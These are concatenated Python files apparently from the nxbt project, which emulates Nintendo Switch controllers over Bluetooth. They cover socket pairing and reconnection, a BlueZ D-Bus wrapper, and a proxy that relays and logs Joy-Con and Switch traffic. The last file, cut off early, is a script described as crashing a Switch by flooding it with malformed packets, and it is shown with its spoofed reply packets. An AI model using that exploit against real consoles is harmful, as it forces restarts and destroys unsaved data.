time.sleep(1/120 - elapsed_time) else: if elapsed_time < 1/60: time.sleep(1/60 - elapsed_time) def save_connection(self, error, state=None): while self.reconnect_counter < 2: try: self.logger.debug("Attempting to reconnect") # Reinitialize the protocol self.protocol = ControllerProtocol( self.controller_type, self.bt.address, colour_body=self.colour_body, colour_buttons=self.colour_buttons) if self.lock: self.lock.acquire() try: itr, ctrl = self.reconnect(self.switch_address) return itr, ctrl finally: if self.lock: self.lock.release() except OSError: self.reconnect_counter += 1 self.logger.exception(error) time.sleep(0.5) # If we can't reconnect, transition to attempting # to connect to any Switch. self.logger.debug("Connecting to any Switch") self.reconnect_counter = 0 # Reinitialize the protocol self.protocol = ControllerProtocol( self.controller_type, self.bt.address, colour_body=self.colour_body, colour_buttons=self.colour_buttons) self.input.reassign_protocol(self.protocol) # Since we were forced to attempt a reconnection # we need to press the L/SL and R/SR buttons before # we can proceed with any input. if self.controller_type == ControllerTypes.PRO_CONTROLLER: self.input.current_macro_commands = "L R 0.0s".strip(" ").split(" ") elif self.controller_type == ControllerTypes.JOYCON_L: self.input.current_macro_commands = "JCL_SL JCL_SR 0.0s".strip(" ").split(" ") elif self.controller_type == ControllerTypes.JOYCON_R: self.input.current_macro_commands = "JCR_SL JCR_SR 0.0s".strip(" ").split(" ") if self.lock: self.lock.acquire() try: itr, ctrl = self.connect() finally: if self.lock: self.lock.release() self.state["state"] = "connected" self.switch_address = itr.getsockname()[0] return itr, ctrl def connect(self): """Configures as a specified controller, pairs with a Nintendo Switch, and creates/accepts sockets for communication with the Switch. """ self.state["state"] = "connecting" # Creating control and interrupt sockets s_ctrl = socket.socket( family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) s_itr = socket.socket( family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) # Setting up HID interrupt/control sockets try: s_ctrl.bind((self.bt.address, 17)) s_itr.bind((self.bt.address, 19)) except OSError: s_ctrl.bind((socket.BDADDR_ANY, 17)) s_itr.bind((socket.BDADDR_ANY, 19)) s_itr.listen(1) s_ctrl.listen(1) self.bt.set_discoverable(True) ctrl, ctrl_address = s_ctrl.accept() itr, itr_address = s_itr.accept() # Send an empty input report to the Switch to prompt a reply self.protocol.process_commands(None) msg = self.protocol.get_report() itr.sendall(msg) # Setting interrupt connection as non-blocking. # In this case, non-blocking means it throws a "BlockingIOError" # for sending and receiving, instead of blocking. fcntl.fcntl(itr, fcntl.F_SETFL, os.O_NONBLOCK) # Mainloop while True: # Attempt to get output from Switch try: reply = itr.recv(50) if self.logger_level <= logging.DEBUG and len(reply) > 40: self.logger.debug(format_msg_switch(reply)) except BlockingIOError: reply = None self.protocol.process_commands(reply) msg = self.protocol.get_report() if self.logger_level <= logging.DEBUG and reply: self.logger.debug(format_msg_controller(msg)) try: itr.sendall(msg) except BlockingIOError: continue # Exit pairing loop when player lights have been set and # vibration has been enabled if (reply and len(reply) > 45 and self.protocol.vibration_enabled and self.protocol.player_number): break # Switch responds to packets slower during pairing # Pairing cycle responds optimally on a 15Hz loop time.sleep(1/15) self.slow_input_frequency = True self.input.exited_grip_order_menu = False return itr, ctrl def reconnect(self, reconnect_address): """Attempts to reconnect with a Switch at the given address. :param reconnect_address: The Bluetooth MAC address of the Switch :type reconnect_address: string or list """ def recreate_sockets(): # Creating control and interrupt sockets ctrl = socket.socket( family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) itr = socket.socket( family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) return itr, ctrl self.state["state"] = "reconnecting" itr = None ctrl = None if type(reconnect_address) == list: for address in reconnect_address: test_itr, test_ctrl = recreate_sockets() try: # Setting up HID interrupt/control sockets test_ctrl.connect((address, 17)) test_itr.connect((address, 19)) itr = test_itr ctrl = test_ctrl except OSError: test_itr.close() test_ctrl.close() pass elif type(reconnect_address) == str: test_itr, test_ctrl = recreate_sockets() # Setting up HID interrupt/control sockets test_ctrl.connect((reconnect_address, 17)) test_itr.connect((reconnect_address, 19)) itr = test_itr ctrl = test_ctrl if not itr and not ctrl: raise OSError("Unable to reconnect to sockets at the given address(es)", reconnect_address) fcntl.fcntl(itr, fcntl.F_SETFL, os.O_NONBLOCK) # Send an empty input report to the Switch to prompt a reply self.protocol.process_commands(None) msg = self.protocol.get_report() itr.sendall(msg) # Setting interrupt connection as non-blocking # In this case, non-blocking means it throws a "BlockingIOError" # for sending and receiving, instead of blocking fcntl.fcntl(itr, fcntl.F_SETFL, os.O_NONBLOCK) return itr, ctrl
Yamakaky/nxbt
scripts/reconnect_proxy.py
<reponame>Yamakaky/nxbt """ This is a quick and dirty script for recording input from a controller and dumping it into a "messages.txt" file. You'll need to input the device's Bluetooth MAC address manually and specify the type of controller before this script works. Note: If you get an Invalid Exchange error when running this script, this means that the Switch has paired to the controller, invalidating the original pairing key we created. You'll need to remove the controller before continuing. """ import socket import sys import os import time import fcntl from time import perf_counter from nxbt import toggle_input_plugin from nxbt import BlueZ from nxbt import Controller from nxbt import JOYCON_L, JOYCON_R, PRO_CONTROLLER JCL_REPLY02 = b'\xA2\x21\x05\x8E\x84\x00\x12\x01\x18\x80\x01\x18\x80\x80\x82\x02\x03\x48\x01\x02\xDC\xA6\x32\x16\x4A\x7C\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' PRO_REPLY02 = b'\xA2\x21\x1A\x40\x00\x00\x00\x02\x20\x00\x01\x00\x00\x00\x82\x02\x03\x48\x03\x02\xDC\xA6\x32\x16\x4A\x7C\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' JCR_REPLY02 = b'\xA2\x21\x05\x8E\x84\x00\x12\x01\x18\x80\x01\x18\x80\x80\x82\x02\x03\x48\x02\x02\xDC\xA6\x32\x16\x4A\x7C\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' def format_message(data, split, name): """Formats a given byte message in hex format split into payload and subcommand sections. :param data: A series of bytes :type data: bytes :param split: The location of the payload/subcommand split :type split: integer :param name: The name featured in the start/end messages :type name: string :return: The formatted data :rtype: string """ payload = "" subcommand = "" for i in range(0, len(data)): data_byte = str(hex(data[i]))[2:].upper() if len(data_byte) < 2: data_byte = "0" + data_byte if i <= split: payload += "0x" + data_byte + " " else: subcommand += "0x" + data_byte + " " formatted = ( f"--- {name} Msg ---\n" + f"Payload: {payload}\n" + f"Subcommand: {subcommand}") return formatted def print_msg_controller(data): """Prints a formatted message from a controller :param data: The bytes from the controller message :type data: bytes """ print(format_message(data, 13, "Controller")) def print_msg_switch(data): """Prints a formatted message from a Switch :param data: The bytes from the Switch message :type data: bytes """ print(format_message(data, 10, "Switch")) def write_to_buffer(buffer, message, message_type): formatted_message = None if message_type == "switch": formatted_message = format_message(message, 10, "Switch") elif message_type == "controller": formatted_message = format_message(message, 13, "Controller") elif message_type == "comment": formatted_message = "### " + message + " ###" else: raise ValueError("Unspecified or wrong message type") buffer.append(formatted_message) if __name__ == "__main__": # Switch Controller Bluetooth MAC Address goes here jc_MAC = "98:B6:E9:B0:05:E7" switch_MAC = "7C:BB:8A:D9:91:5A" # Specify the type of controller here controller_type = PRO_CONTROLLER if controller_type == JOYCON_L: REPLY = JCL_REPLY02 elif controller_type == JOYCON_R: REPLY = JCR_REPLY02 else: REPLY = PRO_REPLY02 port_ctrl = 17 port_itr = 19 message_buffer = [] toggle_input_plugin(False) bt = BlueZ(adapter_path="/org/bluez/hci0") controller = Controller(bt, controller_type) # Joy-Con Sockets jc_ctrl = socket.socket(family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) jc_itr = socket.socket(family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) # Switch sockets switch_itr = socket.socket(family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) switch_ctrl = socket.socket(family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) try: switch_ctrl.bind((bt.address, port_ctrl)) switch_itr.bind((bt.address, port_itr)) # bt.set_alias("Joy-Con (L)") bt.set_alias("Pro Controller") bt.set_discoverable(True) print("Waiting for Switch to connect...") switch_itr.listen(1) switch_ctrl.listen(1) client_control, control_address = switch_ctrl.accept() print("Got Switch Control Client Connection") client_interrupt, interrupt_address = switch_itr.accept() print("Got Switch Interrupt Client Connection") bt.set_alias("Nintendo Switch") print("Connecting to Joy-Con: ", jc_MAC) jc_ctrl.bind((socket.BDADDR_ANY, port_ctrl)) jc_itr.bind((socket.BDADDR_ANY, port_itr)) jc_ctrl.listen(1) jc_itr.listen(1) jc_client_ctrl, _ = jc_ctrl.accept() jc_client_itr, _ = jc_itr.accept() print("Got connection.") # Creating a non-blocking client interrupt connection fcntl.fcntl(client_interrupt, fcntl.F_SETFL, os.O_NONBLOCK) # Initial Input report from Joy-Con jc_data = jc_client_itr.recv(350) print("Got initial Joy-Con Empty Report") # print_msg_controller(jc_data) write_to_buffer( message_buffer, "Joy-Con Empty Report", "comment") write_to_buffer(message_buffer, jc_data, "controller") print(message_buffer) # Send the input report to the Switch a couple times for i in range(3): print("Sending input report", i) client_interrupt.sendall(jc_data) time.sleep(1) # Get the Switch's reply and send it to the Joy-Con reply = client_interrupt.recv(350) # print_msg_switch(reply) write_to_buffer( message_buffer, "Switch Input Report Reply", "comment") write_to_buffer(message_buffer, reply, "switch") jc_client_itr.sendall(reply) # Sending Switch the proxy's device info if controller_type == JOYCON_R: client_interrupt.sendall(REPLY) elif controller_type == JOYCON_L: client_interrupt.sendall(REPLY) elif controller_type == PRO_CONTROLLER: client_interrupt.sendall(REPLY) # Waste some cycles here until we get the controllers info. # We don't want to proxy the device's info to the Switch # since it includes a MAC address. print("Waiting on Joy-Con Device Info") while True: jc_data = jc_client_itr.recv(350) if jc_data[1] == 0x21: print("Got Device Info") # print_msg_controller(jc_data) print("Joy-Con Device Info Reply Length", len(jc_data)) write_to_buffer( message_buffer, "Joy-Con Device Info", "comment") write_to_buffer(message_buffer, jc_data, "controller") break # Main loop print("Entering main proxy loop") write_to_buffer( message_buffer, "Entering Main Loop", "comment") time_old = perf_counter() timer_old = 0 timer_counter = 0 while True: try: reply = client_interrupt.recv(350) # print_msg_switch(reply) write_to_buffer(message_buffer, reply, "switch") except BlockingIOError: reply = None if reply: print("Sending to Controller") jc_client_itr.sendall(reply) jc_data = jc_client_itr.recv(350) timer_new = int(jc_data[2]) if timer_new < timer_old: timer_counter += timer_new - (timer_old - 255) else: timer_counter += timer_new - timer_old timer_old = timer_new # print_msg_controller(jc_data) write_to_buffer(message_buffer, jc_data, "controller") try: client_interrupt.sendall(jc_data) except BlockingIOError: continue time.sleep(1/2) except KeyboardInterrupt: print("Closing sockets") # time_new = perf_counter() # print(f"Total Delta: {(time_new - time_old) * 1000}") # print(f"Timer Counter: {timer_counter}") jc_ctrl.close() jc_itr.close() switch_itr.close() switch_ctrl.close() # Write the buffer with open("messages.txt", "w") as f: f.write("\n".join(message_buffer)) try: sys.exit(1) except SystemExit: os._exit(1) except OSError as e: print("Closing sockets") jc_ctrl.close() jc_itr.close() switch_itr.close() switch_ctrl.close() raise e finally: toggle_input_plugin(True)
Yamakaky/nxbt
nxbt/bluez.py
<gh_stars>0 import subprocess import re import os import time import logging import dbus SERVICE_NAME = "org.bluez" BLUEZ_OBJECT_PATH = "/org/bluez" ADAPTER_INTERFACE = SERVICE_NAME + ".Adapter1" PROFILEMANAGER_INTERFACE = SERVICE_NAME + ".ProfileManager1" DEVICE_INTERFACE = SERVICE_NAME + ".Device1" def find_object_path(bus, service_name, interface_name, object_name=None): """Searches for a D-Bus object path that contains a specified interface under a specified service. :param bus: A DBus object used to access the DBus. :type bus: DBus :param service_name: The name of a D-Bus service to search for the object path under. :type service_name: string :param interface_name: The name of a D-Bus interface to search for within objects under the specified service. :type interface_name: string :param object_name: The name or ending of the object path, defaults to None :type object_name: string, optional :return: The D-Bus object path or None, if no matching object can be found :rtype: string """ manager = dbus.Interface( bus.get_object(service_name, "/"), "org.freedesktop.DBus.ObjectManager") # Iterating over objects under the specified service # and searching for the specified interface for path, ifaces in manager.GetManagedObjects().items(): managed_interface = ifaces.get(interface_name) if managed_interface is None: continue # If the object name wasn't specified or it matches # the interface address or the path ending elif (not object_name or object_name == managed_interface["Address"] or path.endswith(object_name)): obj = bus.get_object(service_name, path) return dbus.Interface(obj, interface_name).object_path return None def find_objects(bus, service_name, interface_name): """Searches for D-Bus objects that contain a specified interface under a specified service. :param bus: A DBus object used to access the DBus. :type bus: DBus :param service_name: The name of a D-Bus service to search for the object path under. :type service_name: string :param interface_name: The name of a D-Bus interface to search for within objects under the specified service. :type interface_name: string :return: The D-Bus object paths matching the arguments :rtype: array """ manager = dbus.Interface( bus.get_object(service_name, "/"), "org.freedesktop.DBus.ObjectManager") paths = [] # Iterating over objects under the specified service # and searching for the specified interface within them for path, ifaces in manager.GetManagedObjects().items(): managed_interface = ifaces.get(interface_name) if managed_interface is None: continue else: obj = bus.get_object(service_name, path) path = str(dbus.Interface(obj, interface_name).object_path) paths.append(path) return paths def toggle_input_plugin(toggle): """Enables or disables the BlueZ input plugin. Requires root user to be run. The units and Bluetooth service will not be restarted if the input plugin already matches the toggle. :param toggle: A boolean element indicating if the plugin is enabled (True) or disabled (False) :type toggle: boolean :raises PermissionError: If the user is not root :raises Exception: If the units can't be reloaded """ service_path = "/lib/systemd/system/bluetooth.service" service = None with open(service_path, "r") as f: service = f.read() # Find the bluetooth service execution line lines = service.split("\n") for i in range(0, len(lines)): line = lines[i] if line.startswith("ExecStart="): # If we want to ensure the plugin is enabled if toggle: # If input is already enabled if "--noplugin=input" not in line: return lines[i] = re.sub(" --noplugin=input", "", line) else: # If input is already disabled if "--noplugin=input" in line: return # If not, add the flag lines[i] = line + " --noplugin=input" service = "\n".join(lines) with open(service_path, "w") as f: f.write(service) # Reload units result = subprocess.run( ["systemctl", "daemon-reload"], stderr=subprocess.PIPE) cmd_err = result.stderr.decode("utf-8").replace("\n", "") if cmd_err != "": raise Exception(cmd_err) # Reload the bluetooth service with input disabled result = subprocess.run( ["systemctl", "restart", "bluetooth"], stderr=subprocess.PIPE) cmd_err = result.stderr.decode("utf-8").replace("\n", "") if cmd_err != "": raise Exception(cmd_err) # Kill a bit of time here to ensure all services have restarted time.sleep(0.5) def find_devices_by_alias(alias): """Finds the Bluetooth addresses of devices that have a specified Bluetooth alias. Aliases are converted to uppercase before comparison as BlueZ usually converts aliases to uppercase. :param address: The Bluetooth MAC address :type address: string :return: The path to the D-Bus object or None :rtype: string or None """ bus = dbus.SystemBus() # Find all connected/paired/discovered devices devices = find_objects( bus, SERVICE_NAME, DEVICE_INTERFACE) addresses = [] for path in devices: # Get the device's address and paired status device_props = dbus.Interface( bus.get_object(SERVICE_NAME, path), "org.freedesktop.DBus.Properties") device_alias = device_props.Get( DEVICE_INTERFACE, "Alias").upper() device_addr = device_props.Get( DEVICE_INTERFACE, "Address").upper() # Check for an address match if device_alias.upper() == alias.upper(): addresses.append(device_addr) bus.close() return addresses class BlueZ(): """Exposes the BlueZ D-Bus API as a Python object. """ def __init__(self, adapter_path="/org/bluez/hci0"): self.logger = logging.getLogger('nxbt') self.bus = dbus.SystemBus() self.device_path = adapter_path # If we weren't able to find an adapter with the specified ID, # try to find any usable Bluetooth adapter if self.device_path is None: self.device_path = find_object_path( self.bus, SERVICE_NAME, ADAPTER_INTERFACE) # If we aren't able to find an adapter still if self.device_path is None: raise Exception("Unable to find a bluetooth adapter") # Load the adapter's interface self.logger.debug(f"Using adapter under object path: {self.device_path}") self.device = dbus.Interface( self.bus.get_object( SERVICE_NAME, self.device_path), "org.freedesktop.DBus.Properties") self.device_id = self.device_path.split("/")[-1] # Load the ProfileManager interface self.profile_manager = dbus.Interface(self.bus.get_object( SERVICE_NAME, BLUEZ_OBJECT_PATH), PROFILEMANAGER_INTERFACE) self.adapter = dbus.Interface( self.bus.get_object( SERVICE_NAME, self.device_path), ADAPTER_INTERFACE) @property def address(self): """Gets the Bluetooth MAC address of the Bluetooth adapter. :return: The Bluetooth Adapter's MAC address :rtype: string """ return self.device.Get(ADAPTER_INTERFACE, "Address").upper() @property def name(self): """Gets the name of the Bluetooth adapter. :return: The name of the Bluetooth adapter. :rtype: string """ return self.device.Get(ADAPTER_INTERFACE, "Name") @property def alias(self): """Gets the alias of the Bluetooth adapter. This value is used as the "friendly" name of the adapter when communicating over Bluetooth. :return: The adapter's alias :rtype: string """ return self.device.Get(ADAPTER_INTERFACE, "Alias") def set_alias(self, value): """Asynchronously sets the alias of the Bluetooth adapter. If you wish to check the set value, a time delay is needed before the alias getter is run. :param value: The new value to be set as the adapter's alias :type value: string """ self.device.Set(ADAPTER_INTERFACE, "Alias", value) @property def pairable(self): """Gets the pairable status of the Bluetooth adapter. :return: A boolean value representing if the adapter is set as pairable or not :rtype: boolean """ return bool(self.device.Get(ADAPTER_INTERFACE, "Pairable")) def set_pairable(self, value): """Sets the pariable boolean status of the Bluetooth adapter. :param value: A boolean value representing if the adapter is pairable or not. :type value: boolean """ dbus_value = dbus.Boolean(value) self.device.Set(ADAPTER_INTERFACE, "Pairable", dbus_value) @property def pairable_timeout(self): """Gets the timeout time (in seconds) for how long the adapter should remain as pairable. Defaults to 0 (no timeout). :return: The pairable timeout in seconds :rtype: int """ return self.device.Get(ADAPTER_INTERFACE, "PairableTimeout") def set_pairable_timeout(self, value): """Sets the timeout time (in seconds) for the pairable property. :param value: The pairable timeout value in seconds :type value: int """ dbus_value = dbus.UInt32(value) self.device.Set(ADAPTER_INTERFACE, "PairableTimeout", dbus_value) @property def discoverable(self): """Gets the discoverable status of the Bluetooth adapter :return: The boolean status of the discoverable status :rtype: boolean """ return bool(self.device.Get(ADAPTER_INTERFACE, "Discoverable")) def set_discoverable(self, value): """Sets the discoverable boolean status of the Bluetooth adapter. :param value: A boolean value representing if the Bluetooth adapter is discoverable or not. :type value: boolean """ dbus_value = dbus.Boolean(value) self.device.Set(ADAPTER_INTERFACE, "Discoverable", dbus_value) @property def discoverable_timeout(self): """Gets the timeout time (in seconds) for how long the adapter should remain as discoverable. Defaults to 180 (3 minutes). :return: The discoverable timeout in seconds :rtype: int """ return self.device.Get(ADAPTER_INTERFACE, "DiscoverableTimeout") def set_discoverable_timeout(self, value): """Sets the discoverable time (in seconds) for the discoverable property. Setting this property to 0 results in an infinite discoverable timeout. :param value: The discoverable timeout value in seconds :type value: int """ dbus_value = dbus.UInt32(value) self.device.Set( ADAPTER_INTERFACE, "DiscoverableTimeout", dbus_value) @property def device_class(self): """Gets the Bluetooth class of the device. This represents what type of device this reporting as (Ex: Gamepad, Headphones, etc). :return: A 32-bit hexadecimal Integer representing the Bluetooth Code for a given device type. :rtype: string """ # This is another hacky bit. We're using hciconfig here instead # of the D-Bus API so that results match the setter. See the # setter for further justification on using hciconfig. result = subprocess.run( ["hciconfig", self.device_id, "class"], stdout=subprocess.PIPE) device_class = result.stdout.decode("utf-8").split("Class: ")[1][0:8] return device_class def set_device_class(self, device_class): """Sets the Bluetooth class of the device. This represents what type of device this reporting as (Ex: Gamepad, Headphones, etc). Note: To work this function *MUST* be run as the super user. An exception is returned if this function is run without elevation. :param device_class: A 32-bit Hexadecimal integer :type device_class: string :raises PermissionError: If user is not root :raises ValueError: If the device class is not length 8 :raises Exception: On inability to set class """ if os.geteuid() != 0: raise PermissionError("The device class must be set as root") if len(device_class) != 8: raise ValueError("Device class must be length 8") # This is a bit of a hack. BlueZ allows you to set this value, however, # a config file needs to filled and the BT daemon restarted. This is a # good compromise but requires super user privileges. Not ideal. result = subprocess.run( ["hciconfig", self.device_id, "class", device_class], stderr=subprocess.PIPE) # Checking if there was a problem setting the device class cmd_err = result.stderr.decode("utf-8").replace("\n", "") if cmd_err != "": raise Exception(cmd_err) @property def powered(self): """The powered state of the adapter (on/off) as a boolean value. :return: A boolean representing the powered state of the adapter. :rtype: boolean """ return bool(self.device.Get(ADAPTER_INTERFACE, "Powered")) def set_powered(self, value): """Switches the adapter on or off. :param value: A boolean value switching the adapter on or off :type value: boolean """ dbus_value = dbus.Boolean(value) self.device.Set(ADAPTER_INTERFACE, "Powered", dbus_value) def register_profile(self, profile_path, uuid, opts): """Registers an SDP record on the BlueZ SDP server. Options (non-exhaustive, refer to BlueZ docs for the complete list): - Name: Human readable name of the profile - Role: Specifies precise local role. Either "client" or "servier". - RequireAuthentication: A boolean value indicating if pairing is required before connection. - RequireAuthorization: A boolean value indiciating if authorization is needed before connection. - AutoConnect: A boolean value indicating whether a connection can be forced if a client UUID is present. - ServiceRecord: An XML SDP record as a string. :param profile_path: The path for the SDP record :type profile_path: string :param uuid: The UUID for the SDP record :type uuid: string :param opts: The options for the SDP server :type opts: dict """ self.profile_manager.RegisterProfile(profile_path, uuid, opts) def reset(self): """Restarts the Bluetooth Service :raises Exception: If the bluetooth service can't be restarted """ result = subprocess.run( ["systemctl", "restart", "bluetooth"], stderr=subprocess.PIPE) cmd_err = result.stderr.decode("utf-8").replace("\n", "") if cmd_err != "": raise Exception(cmd_err) self.device = dbus.Interface( self.bus.get_object( SERVICE_NAME, self.device_path), "org.freedesktop.DBus.Properties") self.profile_manager = dbus.Interface( self.bus.get_object( SERVICE_NAME, BLUEZ_OBJECT_PATH), PROFILEMANAGER_INTERFACE) def get_discovered_devices(self): """Gets a dict of all discovered (or previously discovered and connected) devices. The key is the device's dbus object path and the values are the device's properties. The following is a non-exhaustive list of the properties a device dictionary can contain: - "Address": The Bluetooth address - "Alias": The friendly name of the device - "Paired": Whether the device is paired - "Connected": Whether the device is presently connected - "UUIDs": The services a device provides :return: A dictionary of all discovered devices :rtype: dictionary """ bluez_objects = dbus.Interface( self.bus.get_object(SERVICE_NAME, "/"), "org.freedesktop.DBus.ObjectManager") devices = {} objects = bluez_objects.GetManagedObjects() for path, interfaces in list(objects.items()): if DEVICE_INTERFACE in interfaces: devices[str(path)] = interfaces[DEVICE_INTERFACE] return devices def discover_devices(self, alias=None, timeout=10, callback=None): """Runs a device discovery of the timeout length (in seconds) on the adapter. If specified, a callback is run, every second, and passed an updated list of discovered devices. An alias can be specified to filter discovered devices. The following is a non-exhaustive list of the properties a device dictionary can contain: - "Address": The Bluetooth address - "Alias": The friendly name of the device - "Paired": Whether the device is paired - "Connected": Whether the device is presently connected - "UUIDs": The services a device provides :param alias: The alias of a bluetooth device, defaults to None :type alias: string, optional :param timeout: The discovery timeout in seconds, defaults to 10 :type timeout: int, optional :param callback: A callback function, defaults to None :type callback: function, optional :return: A dictionary of discovered devices with the object path as the key and the device properties as the dictionary properties :rtype: dictionary """ # TODO: Device discovery still needs work. Currently, devices # are added as DBus objects while device discovery runs, however, # added devices linger after discovery stops. This means a device # can become unpairable, still show up on a new discovery session, # and throw an error when an attempt is made to pair it. Using DBus # signals ("interface added"/"property changed") does not solve # this issue. # Get all devices that have been previously discovered devices = self.get_discovered_devices() # Start discovering new devices and loop self.adapter.StartDiscovery() try: for i in range(0, timeout): time.sleep(1) new_devices = self.get_discovered_devices() # Shallowly merging dictionaries. Latter dictionary # overrides the former. Requires Python 3.5 devices = {**devices, **new_devices} if callback: callback(devices) finally: self.adapter.StopDiscovery() # Filter out paired devices or devices that don't # match a specified alias. filtered_devices = {} for key in devices.keys(): # Filter for devices matching alias, if specified if "Alias" not in devices[key].keys(): continue if alias and not alias == devices[key]["Alias"]: continue # Filter for paired devices if "Paired" not in devices[key].keys(): continue if devices[key]["Paired"]: continue filtered_devices[key] = devices[key] return filtered_devices def pair_device(self, device_path): """Pairs a discovered device at a given DBus object path. :param device_path: The D-Bus object path to the device :type device_path: string """ device = dbus.Interface( self.bus.get_object( SERVICE_NAME, device_path), DEVICE_INTERFACE) device.Pair() def connect_device(self, device_path): device = dbus.Interface( self.bus.get_object( SERVICE_NAME, device_path), DEVICE_INTERFACE) try: device.Connect() except dbus.exceptions.DBusException as e: self.logger.exception(e) def remove_device(self, path): """Removes a device that's been either discovered, paired, connected, etc. :param path: The D-Bus path to the object :type path: string """ self.adapter.RemoveDevice( self.bus.get_object(SERVICE_NAME, path)) def find_device_by_address(self, address): """Finds the D-Bus path to a device that contains the specified address. :param address: The Bluetooth MAC address :type address: string :return: The path to the D-Bus object or None :rtype: string or None """ # Find all connected/paired/discovered devices devices = find_objects( self.bus, SERVICE_NAME, DEVICE_INTERFACE) for path in devices: # Get the device's address and paired status device_props = dbus.Interface( self.bus.get_object(SERVICE_NAME, path), "org.freedesktop.DBus.Properties") device_addr = device_props.Get( DEVICE_INTERFACE, "Address").upper() # Check for an address match if device_addr != address.upper(): continue return path return None
Yamakaky/nxbt
scripts/crash_switch.py
""" --------------------------------------------------- --> THIS SCRIPT WILL CRASH YOUR NINTENDO SWITCH <-- --------------------------------------------------- Any save data or active game state will be lost since this forces a restart. I take no responsibility whatsoever for any lost data or harm caused by this script. RUN THIS AT YOUR OWN RISK! --------------------------------------------------- DIRECTIONS FOR USE --------------------------------------------------- This script was tested with a Raspberry Pi 4B (4GB), Python 3.7.3, and a Nintendo Switch on firmware v10.1.0 1.) Open the "Change Grip/Order" menu on your Nintendo Switch. 2.) Start this script with sudo privileges. 3.) Watch your Switch crash. --------------------------------------------------- HOW DOES THIS WORK? --------------------------------------------------- The Switch protects itself against malformed packets when controllers initially connect. This defensiveness, however, is dropped after a controller successfully connects to the Switch. After a successful connection, we can exploit this by blasting the Switch with malformed (specifically empty) packets. Since the Switch isn't expecting this, we trigger a cascade of errors, resulting in the crash. """ import socket import sys import os import time import fcntl from nxbt import toggle_input_plugin from nxbt import BlueZ from nxbt import Controller from nxbt import PRO_CONTROLLER REQUEST_INFO = b'\xA2\x21\x1A\x40\x00\x00\x00\x02\x20\x00\x01\x00\x00\x00\x82\x02\x03\x48\x03\x02\xDC\xA6\x32\x16\x4A\x7C\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SET_SHIPMENT = b'\xA1\x21\xF2\x40\x00\x00\x00\x10\x18\x76\x44\x97\x73\x0B\x80\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SERIAL_NUMBER = b'\xA1\x21\x00\x40\x00\x00\x00\x12\x08\x76\x42\x77\x73\x0C\x90\x10\x00\x60\x00\x00\x10\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' COLOURS = b'\xA1\x21\x26\x40\x00\x00\x00\x11\xF8\x75\x44\x87\x73\x0C\x90\x10\x50\x60\x00\x00\x0D\x32\x32\x32\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' INPUT_MODE = b'\xA1\x21\x5B\x40\x00\x00\x00\x10\x18\x76\x45\x87\x73\x0C\x80\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' TRIGGER_BUTTONS = b'\xA1\x21\xAA\x40\x00\x00\x00\x11\x08\x76\x44\x87\x73\x0B\x83\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' FACTORY_PARAMS = b'\xA1\x21\xEE\x40\x00\x00\x00\x10\xD8\x75\x43\x87\x73\x0C\x90\x10\x80\x60\x00\x00\x18\x50\xFD\x00\x00\xC6\x0F\x0F\x30\x61\x96\x30\xF3\xD4\x14\x54\x41\x15\x54\xC7\x79\x9C\x33\x36\x63\x00\x00\x00\x00\x00' FACTORY_PARAMS_2 = b'\xA1\x21\x15\x40\x00\x00\x00\x11\x18\x76\x45\x97\x73\x0B\x90\x10\x98\x60\x00\x00\x12\x0F\x30\x61\x96\x30\xF3\xD4\x14\x54\x41\x15\x54\xC7\x79\x9C\x33\x36\x63\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' USER_CAL = b'\xA1\x21\x49\x40\x00\x00\x00\x12\x08\x76\x43\xA7\x73\x0A\x90\x10\x10\x80\x00\x00\x18\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00' FACTORY_CAL = b'\xA1\x21\x65\x40\x00\x00\x00\x0F\x38\x76\x46\x87\x73\x0A\x90\x10\x3D\x60\x00\x00\x19\x31\x96\x61\xEA\xE7\x73\xA4\xF5\x5D\x55\x27\x75\xA7\xD5\x5B\x3A\x16\x59\xFF\x32\x32\x32\xFF\xFF\xFF\x00\x00\x00\x00' SIX_AXIS_CAL = 